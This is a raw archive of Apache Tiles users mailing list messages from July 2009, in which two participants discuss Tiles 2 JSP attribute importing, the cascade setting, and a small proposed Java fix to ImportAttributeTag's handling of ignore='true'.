08:14:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 23953 invoked by uid 99); 16 Jul 2009 08:14:01 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 08:14:01 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f211.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 08:13:53 +0000 Received: by bwz7 with SMTP id 7so3870517bwz.8 for <[email protected]>; Thu, 16 Jul 2009 01:13:32 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=FyG5jqOhpgGdZikMLH4/GDFZ9KDIgF3uEgCYCBRDPWY=; b=SprbM+/UAV4BXAj2XqqTdvVD4W8TyXfshggE6ungmBHg6UlQ66tijAL7bEk+aX5gwo CLwG0Jd8eApxJxdHiDA550nraePPyJoxxgQ1VLm59DZMlMrTuqw+ZCqDZg23THh996/2 WrFteXVsB+lcQv5lPv01plfrFSz9ifjjTH7JQ= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=siVx6kQAyAQ5aMbQcXheg/ReOUDYCsibc0D3aNLXu8vuC0tSwP+SBgk5awWjmNVEjy 4PZMf8YhW4I3dytm2Z5uI0to4LcZ7kWTBNF9Fo7+6JPPcwD3Q2iCVaEJyQrPJUctlocq kLdzmZy29drRf+Q0tbSW+EsN5zBZ8fl18Rl+8= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id x7mr8506850bkn.130.1247732012138; Thu, 16 Jul 2009 01:13:32 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 16 Jul 2009 10:13:28 +0200 Message-ID: <[email protected]> Subject: Re: How to use import attribute? From: Antonio Petrelli <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org 2009/7/16 Roshni Basu <[email protected]>: > No . Err... sorry what's this JSP then? Attributes are available only in JSP pages specified in "template" attribute. If you want them to be available elsewhere, try with the "cascade" attribute of <put-attribute>. Antonio From [email protected] Thu Jul 16 08:19:19 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5601 invoked from network); 16 Jul 2009 08:19:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 08:19:18 -0000 Received: (qmail 31191 invoked by uid 500); 16 Jul 2009 08:20:24 -0000 Delivered-To: [email protected] Received: (qmail 31146 invoked by uid 500); 16 Jul 2009 08:20:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30935 invoked by uid 99); 16 Jul 2009 08:20:23 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 08:20:23 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f211.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 08:20:14 +0000 Received: by bwz7 with SMTP id 7so3873322bwz.8 for <[email protected]>; Thu, 16 Jul 2009 01:19:54 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=BaJ09Ox/F27EB0mCs2bpg94g+GCEdsAuBGgg7aljscE=; b=HJ9pRHCZ4glQkIGrPTDnsYDQPO/1UzSknAQuXgEmIqXvYmm54zJkpq+37xmcwt4ARc cBwUy4XbcFWqTt/OPFlt7U4Ql4t6NWaHAiQcG5y2ZQ0sOrypueRFeVkZMzY9UnqqtU9O rVTbEFtoNxzuiV0uluzFmBRaarq6Kmd8+kesY= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=UTqTpLuuQTr6yqq3mJB5xV35SRRhFhMmEdd/YxmRDUE4dFIep+2ZSJI3S86STCsyxJ jTFToGzNgfLNlA16g574AZL6wOstSQt9Dl3niKZP0gIvlyXu6yHQBJbp1Zrie4ssvOwW ba1NLibs52/w/AxSwv/17WtyFDaG7a7g7rEG8= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id i18mr8406082bkg.82.1247732394207; Thu, 16 Jul 2009 01:19:54 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Date: Thu, 16 Jul 2009 10:19:54 +0200 Message-ID: <[email protected]> Subject: Re: How to use import attribute? From: Antonio Petrelli <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org 2009/7/16 Roshni Basu <[email protected]>: > <tiles2:insertDefinition =A0name=3D"main.top"> > <tiles2:importAttribute name=3D"enableID" /> > <c:out value=3D"${enableID}"></c:out> > </tiles2:insertDefinition> Wait a minute, now I understand. You are trying to insert the definition "main.top". The code above is invalid, since: 1. in <tiles:insertDefinition> you can override attribute values by using <tiles:putAttribute> 2. <tiles:importAttribute> imports attribute that are available in that JSP, not the inserted ones. But since "enableID" is already put by <put-attribute>, why do you want to read it here? Antonio From [email protected] Thu Jul 16 08:20:39 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5939 invoked from network); 16 Jul 2009 08:20:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 08:20:39 -0000 Received: (qmail 32412 invoked by uid 500); 16 Jul 2009 08:21:44 -0000 Delivered-To: [email protected] Received: (qmail 32370 invoked by uid 500); 16 Jul 2009 08:21:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 32360 invoked by uid 99); 16 Jul 2009 08:21:44 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 08:21:44 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f211.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 08:21:35 +0000 Received: by bwz7 with SMTP id 7so3873898bwz.8 for <[email protected]>; Thu, 16 Jul 2009 01:21:15 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=87sly2AOPtt9ilWVRPHS52wgB0zruiZfN5fK6zPxMOI=; b=jhWbk9gnGy6kb15tY9qP0w6MEat+R5jLAHFQIJYOsPzwbdb2WWCXWkX864h2+ARWZF Z+T61fNAHdTDKFGw1tpe9y2TeuKLUTduI/RLXV3QoQGoPYdL1aydyDE9zzr8DvVyt/tV q4B8Jcijddn38GeFMol4m/zrKgatCx/ldry/U= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=Zw6Ik8S32gfmZfTCtB3ItPalcJGlYnwD0nQaQpArvOyKy3470mNIQeKNFkSPXaqec5 hA1J2SX8Ah1tezLJrdWqHm0iqEQ1D/X7ojmZV/JzEG3xDRs+DM3mrW0OKFW5wDy1eMgw gsSBVhNz/snS2nx0gqs8YTrW9KYfok/e8LRXk= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id p1mr8391436bkg.195.1247732475097; Thu, 16 Jul 2009 01:21:15 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 16 Jul 2009 10:21:14 +0200 Message-ID: <[email protected]> Subject: Re: How to use import attribute? From: Antonio Petrelli <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org 2009/7/16 Antonio Petrelli <[email protected]>: > 2. <tiles:importAttribute> imports attribute that are available in > that JSP, not the inserted ones. Sorry, I meant that it imports attributes that are available in that JSP, not the *inserting* ones (i.e. JSP whose solely purpose is to insert definitions). Antonio From [email protected] Thu Jul 16 08:28:22 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 8068 invoked from network); 16 Jul 2009 08:28:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 08:28:22 -0000 Received: (qmail 44425 invoked by uid 500); 16 Jul 2009 08:29:28 -0000 Delivered-To: [email protected] Received: (qmail 44363 invoked by uid 500); 16 Jul 2009 08:29:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 44353 invoked by uid 99); 16 Jul 2009 08:29:28 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 08:29:28 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-fx0-f222.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 08:29:18 +0000 Received: by fxm22 with SMTP id 22so3861298fxm.8 for <[email protected]>; Thu, 16 Jul 2009 01:28:58 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=RD7txOrZimWBCKQOUB3Hvz/yEOZu3O9HX6i9NJeQ/DA=; b=k8EdlfZAFaj3vsDawxDiQxEk4V0hMaMc/OI2zaeeFjPB5VYzBsLPtvnQmIRTL5hSlR 8DnJ51M9SqredhSMQ+2D6Fxot0psJv+PdG7mmWII3JnQxiaE6VDWZxjx0BUpGVBCSGMM tjEGSCt1EaxyWi6qFjNT5yd2QHLn1e4Izbc/k= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=gwypDF5ggD2g4wBuUpEg9WbGIz94x9Awf77SEManbTipX85HemTEsXuzvwKw836v9b jRNggckV1OBqPYVc5JTp4kB3dqAkNV+CTGQwb7H6Pofv2faLLh2GsWqbceabMzE8lAJp PXHCHxPFFOLZmuEGEM23mA9gyCp3VvmLSxEPU= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id 5mr637754hbu.4.1247732938443; Thu, 16 Jul 2009 01:28:58 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 16 Jul 2009 13:58:58 +0530 Message-ID: <[email protected]> Subject: Re: How to use import attribute? From: Roshni Basu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=001485f7cb34920c77046ece76ff X-Virus-Checked: Checked by ClamAV on apache.org --001485f7cb34920c77046ece76ff Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit This means my Template.jsp should work with <tiles2:importAttribute name="enableID" /> <c:out value="${enableID}"></c:out> ?? On Thu, Jul 16, 2009 at 1:51 PM, Antonio Petrelli < [email protected]> wrote: > 2009/7/16 Antonio Petrelli <[email protected]>: > > 2. <tiles:importAttribute> imports attribute that are available in > > that JSP, not the inserted ones. > > Sorry, I meant that it imports attributes that are available in that > JSP, not the *inserting* ones (i.e. JSP whose solely purpose is to > insert definitions). > > Antonio > --001485f7cb34920c77046ece76ff-- From [email protected] Thu Jul 16 08:33:32 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9352 invoked from network); 16 Jul 2009 08:33:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 08:33:32 -0000 Received: (qmail 50974 invoked by uid 500); 16 Jul 2009 08:34:38 -0000 Delivered-To: [email protected] Received: (qmail 50914 invoked by uid 500); 16 Jul 2009 08:34:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 50904 invoked by uid 99); 16 Jul 2009 08:34:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 08:34:37 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f211.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 08:34:29 +0000 Received: by bwz7 with SMTP id 7so3879797bwz.8 for <[email protected]>; Thu, 16 Jul 2009 01:34:08 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=E0MMbS+ielIn118xwzbAHko8n/UcMcFBUo3WyvuWIkI=; b=j1if7f/zU7aSyajTQpTWmFF44DED/xD02kDADGznBhR6jPToSH2i0UFei2C3b/xLFP mgV68UDoREDnFMirTyZ+Qns1rc+huNrXhBjgxUsB76AomJr12+Qi/ZSNIq6Gd36+3Qba sfy91dlXHjD6peoMqmLYDU0erSUe9X/LCbzxo= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=ZLqvA+dEn9WwTARpZY80pIn4CNugTnTbPRqF1tb5nEMdFVZ19cDjcT/8NmIGfpAmwY E6360ysKX3/x55IMAbtuceejqiJ0I83t4JvvewvZ6hdzDKx57Gi+lH+gv0ESwvirOoUh 8feNR/I2GZD/U4gj4o3kr7+hK6hIblMjzXlwk= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id i18mr8417494bkg.82.1247733248581; Thu, 16 Jul 2009 01:34:08 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 16 Jul 2009 10:34:08 +0200 Message-ID: <[email protected]> Subject: Re: How to use import attribute? From: Antonio Petrelli <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org 2009/7/16 Roshni Basu <[email protected]>: > This means my Template.jsp should work with > > <tiles2:importAttribute name="enableID" /> > <c:out value="${enableID}"></c:out> > ?? I think so, did you try it? Antonio From [email protected] Thu Jul 16 08:43:29 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 11447 invoked from network); 16 Jul 2009 08:43:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 08:43:29 -0000 Received: (qmail 65315 invoked by uid 500); 16 Jul 2009 08:44:34 -0000 Delivered-To: [email protected] Received: (qmail 65260 invoked by uid 500); 16 Jul 2009 08:44:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 65250 invoked by uid 99); 16 Jul 2009 08:44:34 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 08:44:34 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-fx0-f222.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 08:44:26 +0000 Received: by fxm22 with SMTP id 22so3868356fxm.8 for <[email protected]>; Thu, 16 Jul 2009 01:44:05 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=dSqGpdSl0zt3GwIXL2lwXOLF6Nd1prTM85EGbyQH+dc=; b=hCs7k7NPPECqEvyZpQxmo5mkG2QXhFM+5LC6eZxPUHJWkUrPBPfRQakyGgjpQAykwU hlhWx3z/CQZF7JyNvd5vADqb5flK1VDX1tKTTHsZbH67PkKBvj1WmNLwdgNW9LjwS69s uvFxZBfnJVitfTV4uyjiOR3iAW+JncEy8z/yw= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=RW9NW5usVBArwVxn3N+WUE1UDht1Kd8D9csDzlL4T7ovvI8yNarwFfvoB30eb0e1yk 31XsjKnUN8XBV6EeMz7B2kCIRGgePGuFER4yWKoIfTLbzYlo80vrkPzvRukT1M2yZPrA hlOuOp5Ku5gO6BM6n3ubkTPlml4PctlKl/nSQ= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id m2mr624105hbc.130.1247733844040; Thu, 16 Jul 2009 01:44:04 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 16 Jul 2009 14:14:04 +0530 Message-ID: <[email protected]> Subject: Re: How to use import attribute? From: Roshni Basu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=001485f5b1ee8c5b94046eceacf1 X-Virus-Checked: Checked by ClamAV on apache.org --001485f5b1ee8c5b94046eceacf1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit No I did not try it yet. I'll try that. So this means attributes defined in the tile-definition can be imported to Template.jsp and all other inner jsps can fetch the value of the attribute only if in Tile-definition file it is defined with cascade="true". On Thu, Jul 16, 2009 at 2:04 PM, Antonio Petrelli < [email protected]> wrote: > 2009/7/16 Roshni Basu <[email protected]>: > > This means my Template.jsp should work with > > > > <tiles2:importAttribute name="enableID" /> > > <c:out value="${enableID}"></c:out> > > ?? > > I think so, did you try it? > > Antonio > --001485f5b1ee8c5b94046eceacf1-- From [email protected] Thu Jul 16 09:32:51 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28332 invoked from network); 16 Jul 2009 09:32:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 09:32:50 -0000 Received: (qmail 49254 invoked by uid 500); 16 Jul 2009 09:33:56 -0000 Delivered-To: [email protected] Received: (qmail 49207 invoked by uid 500); 16 Jul 2009 09:33:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49193 invoked by uid 99); 16 Jul 2009 09:33:56 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 09:33:56 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-fx0-f222.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 09:33:48 +0000 Received: by fxm22 with SMTP id 22so3892690fxm.8 for <[email protected]>; Thu, 16 Jul 2009 02:33:26 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=mlpFuADMdoGmuarJx7KKFJ6SaOtb5+trVmpmZVLdb/I=; b=fIUMHoxv284bjBNbAuuhpXGosPdBtcbvW/m2LKoQew3Di1hH56DHggwmlQBIhITXD9 N7iQtP2gdkVQwX68YpTQSDrtc34fDldNPsraU857grz6sQSoq3lurRuuX/5uzCJ/7t6J mjWfAx+y3Cu/K+b+5AzOr4JzkIEZCb4ZrA5mY= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=RBrxnYg0xrbzjfYTbQ/aHlIGczm7KO47JYH9406DqvOkMDwId1qUl3DaRUQQDt4N7R OskqQX7Q8g2OzXlU9xHyvAg67hZX3b/EhhvXFLM2qFzfvJ1bAc8UQ0y8xl1AIBuBKmNL JMz9U/6OzRuInLn77d05b2mXqqTlhmQIGERBs= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id w4mr8463197bkh.122.1247736806626; Thu, 16 Jul 2009 02:33:26 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 16 Jul 2009 11:33:24 +0200 Message-ID: <[email protected]> Subject: Re: How to use import attribute? From: Antonio Petrelli <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org 2009/7/16 Roshni Basu <[email protected]>: > No I did not try it yet. I'll try that. > So this means =A0attributes defined in the tile-definition can be importe= d to > Template.jsp > and all other inner jsps can fetch the value of the attribute only if in > Tile-definition file it is defined with cascade=3D"true". Right. From [email protected] Thu Jul 16 09:40:22 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31684 invoked from network); 16 Jul 2009 09:40:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 09:40:22 -0000 Received: (qmail 60470 invoked by uid 500); 16 Jul 2009 09:41:28 -0000 Delivered-To: [email protected] Received: (qmail 60411 invoked by uid 500); 16 Jul 2009 09:41:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 60401 invoked by uid 99); 16 Jul 2009 09:41:28 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 09:41:28 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO kuber.nabble.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 09:41:18 +0000 Received: from isper.nabble.com ([161.129.204.104]) by kuber.nabble.com with esmtp (Exim 4.63) (envelope-from <[email protected]>) id 1MRNSU-0003ta-02 for [email protected]; Thu, 16 Jul 2009 02:40:58 -0700 Message-ID: <[email protected]> Date: Thu, 16 Jul 2009 02:40:57 -0700 (PDT) From: Roshni Basu <[email protected]> To: [email protected] Subject: Re: Issue with putAttribute tag In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Nabble-From: [email protected] References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Hi Antonio, I had tried with ignore="true" but still it was throwing exception. What I have observed is in ImportAttributeTag.java in tiles 2.1.2, in private void importAttributes(Collection<String> names) method, there is a null check of attributeValue if (attributeValue == null) { throw new TilesJspException( "Error importing attributes. " + "Attribute '" + name + "' has a null value "); } but "ignore" was not checked whether true or false. I changed the above piece of code to if (attributeValue == null&& !ignore) { throw new TilesJspException( "Error importing attributes. " + "Attribute '" + name + "' has a null value "); } And ignore="true" worked. I think this is a bug in Tiles2.1.2. Can you kindly check this issue? Antonio Petrelli-3 wrote: > > 2009/7/10 Roshni Basu <[email protected]>: >> >> But in both casestiles1 and tiles2 header value has null value. >> In case of tiles1 it does not throw any exception when this value is >> null. >> Whereas exception occurs in case of tiles2. >> I'm confused. > > If you don't want to throw exceptions, use the ignore="true" in the > <tiles:insertAttribute> tag. > Anyway notice that the NPE is useful to track bugs on your side, so > use it paying attention. > > Antonio > > -- View this message in context: http://www.nabble.com/Issue-with-putAttribute-tag-tp24353360p24513330.html Sent from the tiles users mailing list [email protected]. From [email protected] Thu Jul 16 09:49:40 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35916 invoked from network); 16 Jul 2009 09:49:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 09:49:40 -0000 Received: (qmail 76790 invoked by uid 500); 16 Jul 2009 09:50:45 -0000 Delivered-To: [email protected] Received: (qmail 76763 invoked by uid 500); 16 Jul 2009 09:50:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 76753 invoked by uid 99); 16 Jul 2009 09:50:45 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 09:50:45 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f211.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 09:50:36 +0000 Received: by bwz7 with SMTP id 7so3915468bwz.8 for <[email protected]>; Thu, 16 Jul 2009 02:50:16 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=imjL6TIBwtr6RyAaxYABMzEqRCEAzAa1E/6ydG+bSVQ=; b=J8bAFaS27LtFUpckrkaskyf49gs9vWSXoHdiIU0Ny1yhQkFX30SpIIPscRsnOKR8qd I/ZhUAwPK8C78s79hQ5x0SeO2XgbGWKqLFEL/C7kg4h0AogEa51BQjcPmKXAJpHMXygc gNY7FFzW45xZwLHPosN8RXneXvj2KKu9y+PUg= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=MXa3SRDn+cRTEkT2TyBFoAw5Un/Te5/O3oJ1iPemHX/bBYqA4S4ZZCJMTDqtxvnt4Y lXtASBIOYA//VJdl+c/RJSFNpXbFpcEVMCkkbv2AJSfTxVYDBx3xk92rdCkN1zFz+OX+ 